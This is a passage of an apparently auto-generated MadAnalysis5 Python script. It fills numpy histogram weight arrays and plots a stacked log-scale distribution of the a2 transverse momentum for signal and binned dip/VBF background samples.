0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0
.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_12
y13_PT_12_weights = numpy.array([0.0,0.0,0.415405431739,1.45475582462,1.45385279881,0.934903917858,0.830163166054,0.83157252103,0.623413387643,1.03884478498,1.14170303091,0.934553959294,0.623284713678,0.830818364652,1.45353832657,0.934981093387,0.830356754015,1.45299593407,0.8304862935,0.830507498738,0.725923406044,1.14223287337,0.622957547139,1.55681937898,1.24583243712,1.03813736668,0.934523089083,0.935069376421,0.519237387602,1.34894168383,1.14351341012,1.454034558,0.830544139083,1.03879400781,0.830573134001,0.623195132364,0.72681027548,0.72723337048,0.414988539633,0.622699045182,0.415281950894,0.41518198334,0.207488211177,0.415680378575,0.311302856641,0.207940733854,0.415326092411,0.72795809918,0.207568560278,0.311245588071,0.623485658558,0.415307772239,0.207918807349,0.207685116964,0.207492971537,0.10395206118,0.207779602891,0.415158325795,0.207530044641,0.415353644796,0.103896985261,0.207964102893,0.0,0.415154863716,0.103514324469,0.20723230578,0.0,0.207676029005,0.207662180686,0.207479411724,0.103966746169,0.104014970055,0.0,0.0,0.0,0.103836312313,0.0,0.103811688271,0.0,0.0,0.10395206118,0.103761069779,0.0,0.0,0.0,0.0,0.103942179828,0.0,0.103973987686,0.103587864813,0.0,0.103720072985,0.0,0.0,0.0,0.0,0.0,0.103973136591,0.0,0.104111980415,0.0,0.10384853057,0.104111980415,0.0,0.0,0.1039572543,0.0,0.0,0.207751184987,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_13
y13_PT_13_weights = numpy.array([0.0,0.0,0.377215365226,0.378243809582,0.340406433675,0.453582877522,0.453908547775,0.302371516343,0.340057550029,0.302507610551,0.567013530783,0.302480983423,0.453924250952,0.189232919431,0.188774068023,0.15131322701,0.491688572945,0.22733943415,0.302581347212,0.377620689279,0.18921776245,0.378158011059,0.453608821902,0.22670381958,0.264578063817,0.302543113387,0.227004592331,0.151338329337,0.37792223581,0.11343902829,0.18915827244,0.15102761124,0.0755870643583,0.0756166955721,0.151096363849,0.189041044804,0.113539483111,0.340365013699,0.151236713846,0.0756410013603,0.0755334232132,0.0378816406616,0.0755660357549,0.075526937118,0.0377518049668,0.226620023782,0.0378559011049,0.113524166823,0.113517498662,0.151277200734,0.0377988689838,0.151200323438,0.0378199203453,0.113495286631,0.0,0.113416565918,0.0756445744022,0.037811135669,0.0378751773247,0.113278833118,0.0377751321512,0.113511331182,0.15113450664,0.0757032906323,0.0,0.0378457054185,0.0378875578011,0.113497562454,0.0376688284649,0.0756174921101,0.0,0.0,0.0754539287202,0.0,0.0376688284649,0.0,0.0,0.113572550818,0.113442783397,0.0378656871433,0.0,0.0,0.0378575852139,0.0377671440129,0.0,0.0378199203453,0.0378457054185,0.0378575852139,0.0,0.0378457054185,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0377988689838,0.0,0.0,0.0,0.0,0.0,0.0378021234105,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0376610906671,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0378656871433,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_14
y13_PT_14_weights = numpy.array([0.0,0.0,0.116736023473,0.0955217010204,0.20153625086,0.159176455988,0.106111447748,0.201548947429,0.0954254379408,0.116760320089,0.116678225227,0.148423327499,0.169654011212,0.137893297931,0.265264516078,0.307751998038,0.169721101038,0.148640900527,0.10611531443,0.138018820832,0.14850383529,0.159232436316,0.0742866600756,0.169638573338,0.106033089716,0.0848648356112,0.116701382038,0.0954570350847,0.0743192094622,0.148545820536,0.0848901133264,0.0424490604109,0.127292672552,0.0318250040909,0.0424693749217,0.0424424091399,0.0318519121609,0.0318437459584,0.0317922238575,0.0318636997713,0.0424261777304,0.0424217050753,0.031818525955,0.0530771276926,0.0318457514393,0.0318408026628,0.0,0.0212045836066,0.0212190692379,0.0212327324777,0.0318204304403,0.0318491852841,0.0423917527142,0.0212298468938,0.0424636037539,0.0211705625721,0.0318461409931,0.0,0.0,0.0318345120899,0.0212292986329,0.0,0.0318147025563,0.0105954010289,0.0106161685764,0.0106079634185,0.0318389270333,0.021216169226,0.0105821460991,0.021196965665,0.0,0.0212325304869,0.0106163604677,0.0,0.0106099111876,0.0,0.0424638778843,0.0106015646361,0.0,0.0318239508527,0.021193387541,0.0106200569007,0.0,0.0212011786175,0.0106099111876,0.0,0.0106140520006,0.0,0.010588048561,0.0106050201229,0.0,0.010588048561,0.021160708303,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106218906893,0.0,0.0106050201229,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106199284922,0.0,0.0106358554727,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0106129554787,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.010588048561,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0
.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_15
y13_PT_15_weights = numpy.array([0.0,0.0,0.0228252502637,0.0170665358471,0.0171468676969,0.0171039472206,0.00570723111907,0.00570723111907,0.00571686207685,0.00575000976816,0.0229268118824,0.0114364410323,0.0114157564119,0.0114455800267,0.0056668369409,0.0113737267881,0.0114221607994,0.0,0.00570977514566,0.011466871845,0.0057587144166,0.0171143582283,0.00565686027916,0.00576110775172,0.00565686027916,0.0,0.0114380410211,0.00570610979725,0.0,0.00570356133857,0.0,0.011467740537,0.0,0.00568977750116,0.0,0.00571145934444,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00565686027916,0.00576110775172,0.0057952881228,0.0,0.0,0.0,0.00574324194831,0.00570356133857,0.0,0.0,0.0,0.0,0.00574574165387,0.0,0.00568977750116,0.0,0.0,0.0,0.0,0.00575000976816,0.0,0.0,0.00572878443139,0.00576830548546,0.00570610979725,0.0,0.00570977514566,0.0,0.0,0.0,0.0,0.0,0.00567245241421,0.00571686207685,0.0,0.0,0.0,0.0,0.0,0.00565686027916,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0056668369409,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00572416618104,0.0,0.0,0.0,0.00567245241421,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00571686207685,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_16
y13_PT_16_weights = numpy.array([0.0,0.0,0.0,0.00135514604284,0.00202941842518,0.000677464239286,0.00203268116737,0.00203176586712,0.00135434955839,0.00270802404675,0.0,0.00135571225854,0.00135453810446,0.00338597278882,0.00135481211706,0.000675013573414,0.000675579644748,0.0,0.00135672962776,0.0,0.0,0.0006770517767,0.000675013573414,0.00203198963927,0.0,0.000677876124396,0.000678638393368,0.000675761261105,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677572660498,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000676887629007,0.0,0.0,0.0,0.0,0.0,0.000675761261105,0.0,0.000676507649474,0.0,0.000674995094166,0.000677876124396,0.00135404262963,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677831369968,0.0,0.0,0.0,0.000679381605616,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000675013573414,0.0,0.0,0.0,0.000678638393368,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000675579644748,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.
0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating a new Canvas
fig = plt.figure(figsize=(12,6),dpi=80)
frame = gridspec.GridSpec(1,1,right=0.7)
pad = fig.add_subplot(frame[0])
# Creating a new Stack
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights+y13_PT_15_weights+y13_PT_16_weights,\
label=r"$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#e5e5e5", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights+y13_PT_15_weights,\
label=r"$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#f2f2f2", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights,\
label=r"$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights,\
label=r"$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights,\
label=r"$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights,\
label=r"$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights,\
label=r"$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights,\
label=r"$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights,\
label=r"$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights,\
label=r"$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights,\
label=r"$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights,\
label=r"$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights,\
label=r"$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights,\
label=r"$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights,\
label=r"$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights+y13_PT_1_weights,\
label=r"$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y13_PT_0_weights,\
label="$signal$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
# Axis
plt.rc('text',usetex=False)
plt.xlabel(r"$p_{T} [ a_{2} ]$ ( GeV ) ",\
fontsize=16,color="black")
plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 150.0\ \mathrm{fb}^{-1})$ ",\
fontsize=16,color="black")
# Boundary of y-axis
ymax=(y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights+y13_PT_15_weights+y13_PT_16_weights).max()*1.1
#ymin=0 # linear scale
ymin=min([x for x in (y13_PT_0_weights+y13_PT_1_weights+y13_PT_2_weights+y13_PT_3_weights+y13_PT_4_weights+y13_PT_5_weights+y13_PT_6_weights+y13_PT_7_weights+y13_PT_8_weights+y13_PT_9_weights+y13_PT_10_weights+y13_PT_11_weights+y13_PT_12_weights+y13_PT_13_weights+y13_PT_14_weights+y13_PT_15_weights+y13_PT_16_weights) if x])/100. # log scale
plt.gca().set_ylim(ymin,ymax)
# Log/Linear scale for X-axis
plt.gca().set_xscale("linear")
#plt.gca().set_xscale("log",nonposx="clip")
# Log/Linear scale for Y-axis
#plt.gca().set_yscale("linear")
plt.gca().set_yscale("log",nonposy="clip")
# Legend
plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.)
# Saving the image
plt.savefig('../../HTML/MadAnalysis5job_0/selection_12.png')
plt.savefig('../../PDF/MadAnalysis5job_0/selection_12.png')
plt.savefig('../../DVI/MadAnalysis5job_0/selection_12.eps')
# Running!
if __name__ == '__main__':
    selection_12()
